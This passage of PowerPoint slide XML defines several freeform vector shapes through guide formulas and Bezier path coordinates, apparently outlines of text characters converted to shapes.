              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1646237" y="946150"/>
              <a:ext cx="88900" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 195 w 230"/>
                <a:gd name="T1" fmla="*/ 126 h 316"/>
                <a:gd name="T2" fmla="*/ 210 w 230"/>
                <a:gd name="T3" fmla="*/ 126 h 316"/>
                <a:gd name="T4" fmla="*/ 230 w 230"/>
                <a:gd name="T5" fmla="*/ 111 h 316"/>
                <a:gd name="T6" fmla="*/ 210 w 230"/>
                <a:gd name="T7" fmla="*/ 95 h 316"/>
                <a:gd name="T8" fmla="*/ 164 w 230"/>
                <a:gd name="T9" fmla="*/ 95 h 316"/>
                <a:gd name="T10" fmla="*/ 144 w 230"/>
                <a:gd name="T11" fmla="*/ 110 h 316"/>
                <a:gd name="T12" fmla="*/ 165 w 230"/>
                <a:gd name="T13" fmla="*/ 126 h 316"/>
                <a:gd name="T14" fmla="*/ 121 w 230"/>
                <a:gd name="T15" fmla="*/ 230 h 316"/>
                <a:gd name="T16" fmla="*/ 85 w 230"/>
                <a:gd name="T17" fmla="*/ 161 h 316"/>
                <a:gd name="T18" fmla="*/ 135 w 230"/>
                <a:gd name="T19" fmla="*/ 68 h 316"/>
                <a:gd name="T20" fmla="*/ 89 w 230"/>
                <a:gd name="T21" fmla="*/ 0 h 316"/>
                <a:gd name="T22" fmla="*/ 37 w 230"/>
                <a:gd name="T23" fmla="*/ 72 h 316"/>
                <a:gd name="T24" fmla="*/ 51 w 230"/>
                <a:gd name="T25" fmla="*/ 153 h 316"/>
                <a:gd name="T26" fmla="*/ 17 w 230"/>
                <a:gd name="T27" fmla="*/ 189 h 316"/>
                <a:gd name="T28" fmla="*/ 0 w 230"/>
                <a:gd name="T29" fmla="*/ 242 h 316"/>
                <a:gd name="T30" fmla="*/ 61 w 230"/>
                <a:gd name="T31" fmla="*/ 316 h 316"/>
                <a:gd name="T32" fmla="*/ 123 w 230"/>
                <a:gd name="T33" fmla="*/ 281 h 316"/>
                <a:gd name="T34" fmla="*/ 181 w 230"/>
                <a:gd name="T35" fmla="*/ 316 h 316"/>
                <a:gd name="T36" fmla="*/ 229 w 230"/>
                <a:gd name="T37" fmla="*/ 258 h 316"/>
                <a:gd name="T38" fmla="*/ 215 w 230"/>
                <a:gd name="T39" fmla="*/ 241 h 316"/>
                <a:gd name="T40" fmla="*/ 201 w 230"/>
                <a:gd name="T41" fmla="*/ 257 h 316"/>
                <a:gd name="T42" fmla="*/ 181 w 230"/>
                <a:gd name="T43" fmla="*/ 285 h 316"/>
                <a:gd name="T44" fmla="*/ 139 w 230"/>
                <a:gd name="T45" fmla="*/ 256 h 316"/>
                <a:gd name="T46" fmla="*/ 165 w 230"/>
                <a:gd name="T47" fmla="*/ 203 h 316"/>
                <a:gd name="T48" fmla="*/ 195 w 230"/>
                <a:gd name="T49" fmla="*/ 126 h 316"/>
                <a:gd name="T50" fmla="*/ 73 w 230"/>
                <a:gd name="T51" fmla="*/ 129 h 316"/>
                <a:gd name="T52" fmla="*/ 65 w 230"/>
                <a:gd name="T53" fmla="*/ 72 h 316"/>
                <a:gd name="T54" fmla="*/ 89 w 230"/>
                <a:gd name="T55" fmla="*/ 30 h 316"/>
                <a:gd name="T56" fmla="*/ 107 w 230"/>
                <a:gd name="T57" fmla="*/ 68 h 316"/>
                <a:gd name="T58" fmla="*/ 73 w 230"/>
                <a:gd name="T59" fmla="*/ 129 h 316"/>
                <a:gd name="T60" fmla="*/ 63 w 230"/>
                <a:gd name="T61" fmla="*/ 184 h 316"/>
                <a:gd name="T62" fmla="*/ 83 w 230"/>
                <a:gd name="T63" fmla="*/ 220 h 316"/>
                <a:gd name="T64" fmla="*/ 105 w 230"/>
                <a:gd name="T65" fmla="*/ 256 h 316"/>
                <a:gd name="T66" fmla="*/ 62 w 230"/>
                <a:gd name="T67" fmla="*/ 285 h 316"/>
                <a:gd name="T68" fmla="*/ 34 w 230"/>
                <a:gd name="T69" fmla="*/ 240 h 316"/>
                <a:gd name="T70" fmla="*/ 63 w 230"/>
                <a:gd name="T71" fmla="*/ 18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0" h="316">
                  <a:moveTo>
                    <a:pt x="195" y="126"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="210" y="126"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="218" y="126"/>
                    <a:pt x="230" y="126"/>
                    <a:pt x="230" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="95"/>
                    <a:pt x="218" y="95"/>
                    <a:pt x="210" y="95"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="164" y="95"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="157" y="95"/>
                    <a:pt x="144" y="95"/>
                    <a:pt x="144" y="110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="126"/>
                    <a:pt x="156" y="126"/>
                    <a:pt x="165" y="126"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="161"/>
                    <a:pt x="135" y="204"/>
                    <a:pt x="121" y="230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="220"/>
                    <a:pt x="95" y="188"/>
                    <a:pt x="85" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="109"/>
                    <a:pt x="135" y="80"/>
                    <a:pt x="135" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="38"/>
                    <a:pt x="124" y="0"/>
                    <a:pt x="89" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="37" y="22"/>
                    <a:pt x="37" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="94"/>
                    <a:pt x="41" y="122"/>
                    <a:pt x="51" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="157"/>
                    <a:pt x="18" y="189"/>
                    <a:pt x="17" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="201"/>
                    <a:pt x="0" y="219"/>
                    <a:pt x="0" y="242"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="280"/>
                    <a:pt x="23" y="316"/>
                    <a:pt x="61" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="316"/>
                    <a:pt x="108" y="300"/>
                    <a:pt x="123" y="281"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="290"/>
                    <a:pt x="152" y="316"/>
                    <a:pt x="181" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="214" y="316"/>
                    <a:pt x="229" y="282"/>
                    <a:pt x="229" y="258"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229" y="241"/>
                    <a:pt x="216" y="241"/>
                    <a:pt x="215" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="241"/>
                    <a:pt x="201" y="254"/>
                    <a:pt x="201" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="279"/>
                    <a:pt x="189" y="285"/>
                    <a:pt x="181" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="285"/>
                    <a:pt x="144" y="262"/>
                    <a:pt x="139" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="239"/>
                    <a:pt x="160" y="216"/>
                    <a:pt x="165" y="203"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="195" y="126"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="73" y="129"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="103"/>
                    <a:pt x="65" y="76"/>
                    <a:pt x="65" y="72"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="43"/>
                    <a:pt x="78" y="30"/>
                    <a:pt x="89" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="30"/>
                    <a:pt x="107" y="64"/>
                    <a:pt x="107" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="83"/>
                    <a:pt x="98" y="101"/>
                    <a:pt x="73" y="129"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="63" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="192"/>
                    <a:pt x="76" y="209"/>
                    <a:pt x="83" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="94" y="240"/>
                    <a:pt x="97" y="244"/>
                    <a:pt x="105" y="256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="283"/>
                    <a:pt x="69" y="285"/>
                    <a:pt x="62" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="285"/>
                    <a:pt x="34" y="254"/>
                    <a:pt x="34" y="240"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="216"/>
                    <a:pt x="40" y="210"/>
                    <a:pt x="63" y="18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6" name="Freeform 107">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23ADCD45-8E30-45EF-943D-975596212ED4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1743075" y="982663"/>
              <a:ext cx="96838" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 250"/>
                <a:gd name="T1" fmla="*/ 27 h 218"/>
                <a:gd name="T2" fmla="*/ 57 w 250"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 250"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 250"/>
                <a:gd name="T7" fmla="*/ 19 h 218"/>
                <a:gd name="T8" fmla="*/ 20 w 250"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 43 w 250"/>
                <a:gd name="T11" fmla="*/ 34 h 218"/>
                <a:gd name="T12" fmla="*/ 43 w 250"/>
                <a:gd name="T13" fmla="*/ 188 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 250"/>
                <a:gd name="T15" fmla="*/ 188 h 218"/>
                <a:gd name="T16" fmla="*/ 0 w 250"/>
                <a:gd name="T17" fmla="*/ 203 h 218"/>
                <a:gd name="T18" fmla="*/ 20 w 250"/>
                <a:gd name="T19" fmla="*/ 218 h 218"/>
                <a:gd name="T20" fmla="*/ 100 w 250"/>
                <a:gd name="T21" fmla="*/ 218 h 218"/>
                <a:gd name="T22" fmla="*/ 120 w 250"/>
                <a:gd name="T23" fmla="*/ 203 h 218"/>
                <a:gd name="T24" fmla="*/ 99 w 250"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 77 w 250"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 250"/>
                <a:gd name="T29" fmla="*/ 99 h 218"/>
                <a:gd name="T30" fmla="*/ 139 w 250"/>
                <a:gd name="T31" fmla="*/ 31 h 218"/>
                <a:gd name="T32" fmla="*/ 173 w 250"/>
                <a:gd name="T33" fmla="*/ 74 h 218"/>
                <a:gd name="T34" fmla="*/ 173 w 250"/>
                <a:gd name="T35" fmla="*/ 188 h 218"/>
                <a:gd name="T36" fmla="*/ 153 w 250"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 133 w 250"/>
                <a:gd name="T39" fmla="*/ 203 h 218"/>
                <a:gd name="T40" fmla="*/ 153 w 250"/>
                <a:gd name="T41" fmla="*/ 218 h 218"/>
                <a:gd name="T42" fmla="*/ 230 w 250"/>
                <a:gd name="T43" fmla="*/ 218 h 218"/>
                <a:gd name="T44" fmla="*/ 250 w 250"/>
                <a:gd name="T45" fmla="*/ 203 h 218"/>
                <a:gd name="T46" fmla="*/ 229 w 250"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 207 w 250"/>
                <a:gd name="T49" fmla="*/ 188 h 218"/>
                <a:gd name="T50" fmla="*/ 207 w 250"/>
                <a:gd name="T51" fmla="*/ 72 h 218"/>
                <a:gd name="T52" fmla="*/ 142 w 250"/>
                <a:gd name="T53" fmla="*/ 0 h 218"/>
                <a:gd name="T54" fmla="*/ 77 w 250"/>
                <a:gd name="T55" fmla="*/ 2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50" h="218">
                  <a:moveTo>
                    <a:pt x="77" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="11"/>
                    <a:pt x="77" y="3"/>
                    <a:pt x="57" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="19"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="13" y="34"/>
                    <a:pt x="20" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43" y="34"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="13" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="100" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="218"/>
                    <a:pt x="120" y="218"/>
                    <a:pt x="120" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="188"/>
                    <a:pt x="107" y="188"/>
                    <a:pt x="99" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="77" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77" y="99"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="50"/>
                    <a:pt x="114" y="31"/>
                    <a:pt x="139" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="31"/>
                    <a:pt x="173" y="45"/>
                    <a:pt x="173" y="74"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="145" y="188"/>
                    <a:pt x="133" y="188"/>
                    <a:pt x="133" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="218"/>
                    <a:pt x="146" y="218"/>
                    <a:pt x="153" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="230" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="218"/>
                    <a:pt x="250" y="218"/>
                    <a:pt x="250" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="188"/>
                    <a:pt x="237" y="188"/>
                    <a:pt x="229" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="207" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="22"/>
                    <a:pt x="182" y="0"/>
                    <a:pt x="142" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="109" y="0"/>
                    <a:pt x="87" y="17"/>
                    <a:pt x="77" y="2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7" name="Freeform 108">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6FC3BFCF-8DB6-48CB-BC86-4C3E938FBB48}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1852612" y="982663"/>
              <a:ext cx="90488" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 155 w 234"/>
                <a:gd name="T1" fmla="*/ 203 h 222"/>
                <a:gd name="T2" fmla="*/ 209 w 234"/>
                <a:gd name="T3" fmla="*/ 219 h 222"/>
                <a:gd name="T4" fmla="*/ 234 w 234"/>
                <a:gd name="T5" fmla="*/ 204 h 222"/>
                <a:gd name="T6" fmla="*/ 214 w 234"/>
                <a:gd name="T7" fmla="*/ 189 h 222"/>
                <a:gd name="T8" fmla="*/ 184 w 234"/>
                <a:gd name="T9" fmla="*/ 185 h 222"/>
                <a:gd name="T10" fmla="*/ 184 w 234"/>
                <a:gd name="T11" fmla="*/ 77 h 222"/>
                <a:gd name="T12" fmla="*/ 86 w 234"/>
                <a:gd name="T13" fmla="*/ 0 h 222"/>
                <a:gd name="T14" fmla="*/ 13 w 234"/>
                <a:gd name="T15" fmla="*/ 36 h 222"/>
                <a:gd name="T16" fmla="*/ 36 w 234"/>
                <a:gd name="T17" fmla="*/ 59 h 222"/>
                <a:gd name="T18" fmla="*/ 58 w 234"/>
                <a:gd name="T19" fmla="*/ 36 h 222"/>
                <a:gd name="T20" fmla="*/ 68 w 234"/>
                <a:gd name="T21" fmla="*/ 31 h 222"/>
                <a:gd name="T22" fmla="*/ 86 w 234"/>
                <a:gd name="T23" fmla="*/ 30 h 222"/>
                <a:gd name="T24" fmla="*/ 150 w 234"/>
                <a:gd name="T25" fmla="*/ 81 h 222"/>
                <a:gd name="T26" fmla="*/ 0 w 234"/>
                <a:gd name="T27" fmla="*/ 155 h 222"/>
                <a:gd name="T28" fmla="*/ 83 w 234"/>
                <a:gd name="T29" fmla="*/ 222 h 222"/>
                <a:gd name="T30" fmla="*/ 155 w 234"/>
                <a:gd name="T31" fmla="*/ 203 h 222"/>
                <a:gd name="T32" fmla="*/ 150 w 234"/>
                <a:gd name="T33" fmla="*/ 110 h 222"/>
                <a:gd name="T34" fmla="*/ 150 w 234"/>
                <a:gd name="T35" fmla="*/ 152 h 222"/>
                <a:gd name="T36" fmla="*/ 130 w 234"/>
                <a:gd name="T37" fmla="*/ 183 h 222"/>
                <a:gd name="T38" fmla="*/ 86 w 234"/>
                <a:gd name="T39" fmla="*/ 192 h 222"/>
                <a:gd name="T40" fmla="*/ 35 w 234"/>
                <a:gd name="T41" fmla="*/ 155 h 222"/>
                <a:gd name="T42" fmla="*/ 150 w 234"/>
                <a:gd name="T43" fmla="*/ 1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4" h="222">
                  <a:moveTo>
                    <a:pt x="155" y="203"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="166" y="219"/>
                    <a:pt x="190" y="219"/>
                    <a:pt x="209" y="219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="219"/>
                    <a:pt x="234" y="219"/>
                    <a:pt x="234" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="189"/>
                    <a:pt x="222" y="189"/>
                    <a:pt x="214" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="189"/>
                    <a:pt x="188" y="186"/>
                    <a:pt x="184" y="185"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="77"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="42"/>
                    <a:pt x="157" y="0"/>
                    <a:pt x="86" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="0"/>
                    <a:pt x="13" y="0"/>
                    <a:pt x="13" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="51"/>
                    <a:pt x="24" y="59"/>
                    <a:pt x="36" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="59"/>
                    <a:pt x="57" y="55"/>
                    <a:pt x="58" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="32"/>
                    <a:pt x="58" y="32"/>
                    <a:pt x="68" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="30"/>
                    <a:pt x="82" y="30"/>
                    <a:pt x="86" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="30"/>
                    <a:pt x="150" y="46"/>
                    <a:pt x="150" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="82"/>
                    <a:pt x="0" y="107"/>
                    <a:pt x="0" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="190"/>
                    <a:pt x="32" y="222"/>
                    <a:pt x="83" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="222"/>
                    <a:pt x="132" y="219"/>
                    <a:pt x="155" y="203"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="150" y="110"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150" y="152"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="164"/>
                    <a:pt x="150" y="174"/>
                    <a:pt x="130" y="183"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="192"/>
                    <a:pt x="90" y="192"/>
                    <a:pt x="86" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="192"/>
                    <a:pt x="35" y="175"/>
                    <a:pt x="35" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="131"/>
                    <a:pt x="78" y="112"/>
                    <a:pt x="150" y="11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8" name="Freeform 109">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21D77CE2-A66C-4D15-B5B7-F48DBE273D49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1941512" y="982663"/>
              <a:ext cx="100013" cy="85725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 57 w 260"/>
                <a:gd name="T1" fmla="*/ 18 h 218"/>
                <a:gd name="T2" fmla="*/ 37 w 260"/>
                <a:gd name="T3" fmla="*/ 3 h 218"/>
                <a:gd name="T4" fmla="*/ 21 w 260"/>
                <a:gd name="T5" fmla="*/ 3 h 218"/>
                <a:gd name="T6" fmla="*/ 0 w 260"/>
                <a:gd name="T7" fmla="*/ 18 h 218"/>
                <a:gd name="T8" fmla="*/ 29 w 260"/>
                <a:gd name="T9" fmla="*/ 34 h 218"/>
                <a:gd name="T10" fmla="*/ 29 w 260"/>
                <a:gd name="T11" fmla="*/ 188 h 218"/>
                <a:gd name="T12" fmla="*/ 0 w 260"/>
                <a:gd name="T13" fmla="*/ 203 h 218"/>
                <a:gd name="T14" fmla="*/ 21 w 260"/>
                <a:gd name="T15" fmla="*/ 218 h 218"/>
                <a:gd name="T16" fmla="*/ 65 w 260"/>
                <a:gd name="T17" fmla="*/ 218 h 218"/>
                <a:gd name="T18" fmla="*/ 85 w 260"/>
                <a:gd name="T19" fmla="*/ 203 h 218"/>
                <a:gd name="T20" fmla="*/ 57 w 260"/>
                <a:gd name="T21" fmla="*/ 188 h 218"/>
                <a:gd name="T22" fmla="*/ 57 w 260"/>
                <a:gd name="T23" fmla="*/ 98 h 218"/>
                <a:gd name="T24" fmla="*/ 98 w 260"/>
                <a:gd name="T25" fmla="*/ 31 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 260"/>
                <a:gd name="T27" fmla="*/ 71 h 218"/>
                <a:gd name="T28" fmla="*/ 116 w 260"/>
                <a:gd name="T29" fmla="*/ 188 h 218"/>
                <a:gd name="T30" fmla="*/ 94 w 260"/>
                <a:gd name="T31" fmla="*/ 203 h 218"/>
                <a:gd name="T32" fmla="*/ 115 w 260"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 152 w 260"/>
                <a:gd name="T35" fmla="*/ 218 h 218"/>
                <a:gd name="T36" fmla="*/ 172 w 260"/>
                <a:gd name="T37" fmla="*/ 203 h 218"/>
                <a:gd name="T38" fmla="*/ 144 w 260"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 144 w 260"/>
                <a:gd name="T41" fmla="*/ 98 h 218"/>
                <a:gd name="T42" fmla="*/ 185 w 260"/>
                <a:gd name="T43" fmla="*/ 31 h 218"/>
                <a:gd name="T44" fmla="*/ 203 w 260"/>
                <a:gd name="T45" fmla="*/ 71 h 218"/>
                <a:gd name="T46" fmla="*/ 203 w 260"/>
                <a:gd name="T47" fmla="*/ 188 h 218"/>
                <a:gd name="T48" fmla="*/ 181 w 260"/>
                <a:gd name="T49" fmla="*/ 203 h 218"/>
                <a:gd name="T50" fmla="*/ 202 w 260"/>
                <a:gd name="T51" fmla="*/ 218 h 218"/>
                <a:gd name="T52" fmla="*/ 239 w 260"/>
                <a:gd name="T53" fmla="*/ 218 h 218"/>
                <a:gd name="T54" fmla="*/ 260 w 260"/>
                <a:gd name="T55" fmla="*/ 203 h 218"/>
                <a:gd name="T56" fmla="*/ 231 w 260"/>
                <a:gd name="T57" fmla="*/ 188 h 218"/>
                <a:gd name="T58" fmla="*/ 231 w 260"/>
                <a:gd name="T59" fmla="*/ 67 h 218"/>
                <a:gd name="T60" fmla="*/ 187 w 260"/>
                <a:gd name="T61" fmla="*/ 0 h 218"/>
                <a:gd name="T62" fmla="*/ 138 w 260"/>
                <a:gd name="T63" fmla="*/ 26 h 218"/>
                <a:gd name="T64" fmla="*/ 100 w 260"/>
                <a:gd name="T65" fmla="*/ 0 h 218"/>
                <a:gd name="T66" fmla="*/ 57 w 260"/>
                <a:gd name="T67"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60" h="218">
                  <a:moveTo>
                    <a:pt x="57" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="3"/>
                    <a:pt x="46" y="3"/>
                    <a:pt x="37" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="34"/>
                    <a:pt x="11" y="34"/>
                    <a:pt x="29" y="34"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="29" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="14" y="218"/>
                    <a:pt x="21" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="65" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="218"/>
                    <a:pt x="85" y="218"/>
                    <a:pt x="85" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="85" y="188"/>
                    <a:pt x="75" y="188"/>
                    <a:pt x="57" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57" y="98"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="54"/>
                    <a:pt x="77" y="31"/>
                    <a:pt x="98" y="31"/>
                  </a:cubicBezTo>
